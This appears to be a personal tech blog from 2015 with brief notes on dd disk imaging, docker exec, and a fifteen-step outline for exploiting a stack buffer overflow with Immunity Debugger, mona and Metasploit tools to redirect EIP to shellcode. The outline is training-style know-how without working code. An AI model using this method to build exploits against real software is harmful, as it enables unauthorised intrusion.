Wednesday, July 22, 2015
Windows Infections without tools
http://909research.com/find-a-windows-infection-quickly-without-tools/
Tuesday, July 21, 2015
dd
sudo dd if=/dev/sdc conv=sync,noerror of=/home/backup.img bs=64K
You will also need to use those options for the restore:
sudo dd if=/home/backup.img of=/dev/sdb conv=sync,noerror bs=64K
Wednesday, July 8, 2015
Start another shell session on same container in Docker
docker exec -it "id of running container" bashThursday, July 2, 2015
Refresher buffer overflow
1. Fuzz
2. Load immunity debugger
3. Overwrite EIP register
4. Use /usr/share/metasploit-framework/tools/pattern_create.rb [length]
5. Find value crashed in EIP register.
6. Use /usr/share/metasploit-framework/tools/pattern_offset.rb [value] of the crashed value in the EIP register.
7. Use this as the new base length for the crash.
8. Find out if there are any restricted characters for payload in shell code.
9. !mona modules in immunity debugger. So we can find the loaded libraries. Find one that does not have protection ( ASLR , the range of memory does not include null bytes)
10. Search for jmp esp register to use:
10.a Use /usr/share/metasploit-framework/tools/nasm_shell.rb to search for the opcode equivalent of jump esp
nasm > jmp esp
00000000 FFE4 jmp esp
11. Search for this op code in mona again: !mona find -s “\xff\xe4” -m slmfc.dll
12. Select one that does not have bad addresses, double check the contents at this address by double clicking.
13. Replace your EIP address that will be modified during the overflow with this jmp esp register value.
14. To validate, set a breakpoint at the address of the jmp esp register. Run the exploit again to make sure that the address has been hit.
15. Add shell code so that jsp will now run the shell code
Subscribe to:
Posts (Atom)